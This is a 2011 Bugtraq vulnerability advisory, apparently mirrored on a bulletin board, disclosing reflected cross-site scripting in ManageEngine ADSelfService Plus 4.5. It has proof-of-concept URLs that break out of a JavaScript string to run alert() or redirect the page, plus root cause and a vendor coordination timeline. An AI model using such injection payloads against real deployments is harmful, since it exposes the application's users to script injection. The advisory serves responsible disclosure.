Cross-Site Scripting Vuln in Zoho ManageEngine ADSelfServicePlus

看板Bugtraq作者時間14年前 (2011/11/18 07:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
Vulnerability ID: VRPTH-2011-001 Reference:=A0http://jameswebb.me/vulns/vrpth-2011-001.txt Vulnerability Summary =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Non-persistent XSS in Zoho ManageEngine ADSelfService Plus Test Environment =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Windows 2008RC2 fully patched. ManageEngine ADSelfServicePlus version 4.5 Build 4521 installed. Integrated Into TestDomain Technical Details =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Corporate Directory Search feature in ManageEngine ADSelfServicePlus version 4.5 Build 4521 is susceptible to non-persistent XSS attacks. These vulnerabilities are manifest by the ability for attacker to terminate javascript variable declarations, escape encapsulation, and append arbitrary javascript code. ADSelfService Plus is a password management application for Active Directory environments. Proof of Concept =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Double-Quote String Termination HTTP Request =3D https://serverip:port/EmployeeSearch.cc?searchType=3Dcontains&searchBy=3DAL= L_FIELDS&searchString=3D";alert("XSS");//\" Response Source View <script language=3D"javascript"> var searchValue =3D "';alert(XSS)//\""; Single-Quote String Termination Similarly... HTTP Request=3D https://serverip:port/EmployeeSearch.cc?searchType=3D';document.location=3D= "http://www.cnn.com";//\"&searchBy=3DALL_FIELDS&searchString=3DBob Root Cause Analysis =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Input is not being escaped/filtered prior to javascript variable assignment= .. Fix/Work Around =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Not aware of patch/fix. Contact Vendor. Coordination History =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D 09/28/11 - Contacted AdSelfServicePro Team with Vuln. Details 10/07/11 - Requested Update 10/08/11 - Received Response: Advised issues will be handled in future rele= ase. 10/27/11 - Requested Update: =A0Inquired if newer posted builds fixed issue= .. 11/03/11 - Received Response: Newer build did not address; Indicated still researching.. 11/17/11 - Released Advisory
更多 james. 的文章
文章代碼(AID): #1EnP8kRZ (Bugtraq)